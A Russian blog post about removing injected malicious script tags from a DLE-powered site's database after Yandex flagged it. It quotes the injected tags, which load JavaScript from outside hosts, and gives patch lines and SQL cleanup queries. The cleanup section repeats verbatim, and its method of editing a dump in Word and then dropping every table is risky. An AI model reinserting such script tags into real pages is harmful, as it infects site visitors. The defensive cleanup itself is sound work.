Сегодня:
|
День открытых дверей в компании «Доктор Веб»: найдите работу своей мечты! 18 мая 2012 года Вы амбициозны, активны, и у вас много времени, которое вы не хотите тратить на маленькие конторы с серой зарплатой и неясными целями? Нам есть что вам предложить! 23 мая в 12:30 ведущий российский разработчик средств информационной безопасности — компания «Доктор Веб» — проводит день открытых дверей, на котором студенты, выпускники и молодые специалисты в области продаж смогут ... |
Реклама
Популярное
- Анонсированы версии Windows 8
- Я помню" Я Горжусь. С Днем победы!!!
- Сравниваем плееры: стоит ли платить за софт?
- Популярность операционных систем (Windows, Linux, Mac ...
- Антивирус Касперского показал максимальный результат за ...
- Windows 8 и сверхчеткие дисплеи.
- iChill HerculeS 3000 GT 680
- Капчу заменят на мини-игры.
- Поддержка медиа-контента в Windows 8
- Возможность самовосстановления смартфона от лучей Солнц ...
Наши партнеры
Авторизация
Опрос
Реклама
Новости партнеров
Счетчики
Одним после новогодним вечером января 2011 года получаю от Яндекса шайбу:
Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.
Срочно пишу Платону и получаю ответ:
Здравствуйте!
При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:
[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]
Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.
Подобный ссылки неоднократно встречаются на страницах сайта, при этом имена скриптов могут варьироваться. Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ).
---
С уважением, Платон Щукин
Служба поддержки Яндекса
Срочно лечу на Dle форум и получаю еще одну шайбу от Целсофта за свой скрипт DLE:
"Вирус в базе данных, а не в файлах, а причина несвоевременная установка патчей безопасности"
Вот Вам и забросил на пару месяцев сайт
А теперь будим бороться вместе:
Закрываем дыры в безопасности скрипта:
Проблема: Недостаточная фильтрация входящих данных.
Ошибка в версии: 9.0 и все более ранние версии
Степень опасности: Высокая
Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;
ниже добавьте:
$sql_count = "";
Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;
ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );
Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.
2. Устраняем теперь сам вирус из БД (чистим SQL базу)
как видим из кода:
[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]
[quote] у нас в краткой и полной новости на сайтах DLE появляются скрипты.
Это вирус на сайте. Как удалить вирус на сайте ??
<script src="h**p://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="**p://zheenix.msk.ru/abc.js" type="text/javascript"></script><script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
Делим их для удобства на части
1.
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>
2.
<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>
3.
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
4. script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
5. script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
1 код удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!
Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
Нажимаем ОК, после чего пропадет из новостей скрипт №2!
Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
Нажимаем ОК!
Скрипт №3 так же удален!
Теперь возьмемся за скрипт №1
В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!
Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!
Теперь снова идем во вкладку SQL и выполняем такой запрос:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
Нажимаем ОК!
Вот собственно и все!
ах да еще последних 2 запроса 4 и 5
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
1.
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>
2.
<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>
3.
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
4. script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
5. script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
1 код удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!
Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
Нажимаем ОК, после чего пропадет из новостей скрипт №2!
Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
Нажимаем ОК!
Скрипт №3 так же удален!
Теперь возьмемся за скрипт №1
В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!
Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!
Теперь снова идем во вкладку SQL и выполняем такой запрос:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
Нажимаем ОК!
Вот собственно и все!
ах да еще последних 2 запроса 4 и 5
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
Примечание: Открываем скачанную базу SQL базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
Да я бы все-таки поменял пароли к админке, фтп, SQL, изменил подход к безопасности сайтов DLE -ставил бы обновление защиты регулярно!!!
Удачи Вам и чтобв ни каких вирусов в Новом году!
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Информация
Посетители, находящиеся в группе Прохожий, не могут оставлять комментарии к данной публикации.
© 2011 zloyweb.ru
Все права защищены
Все права защищены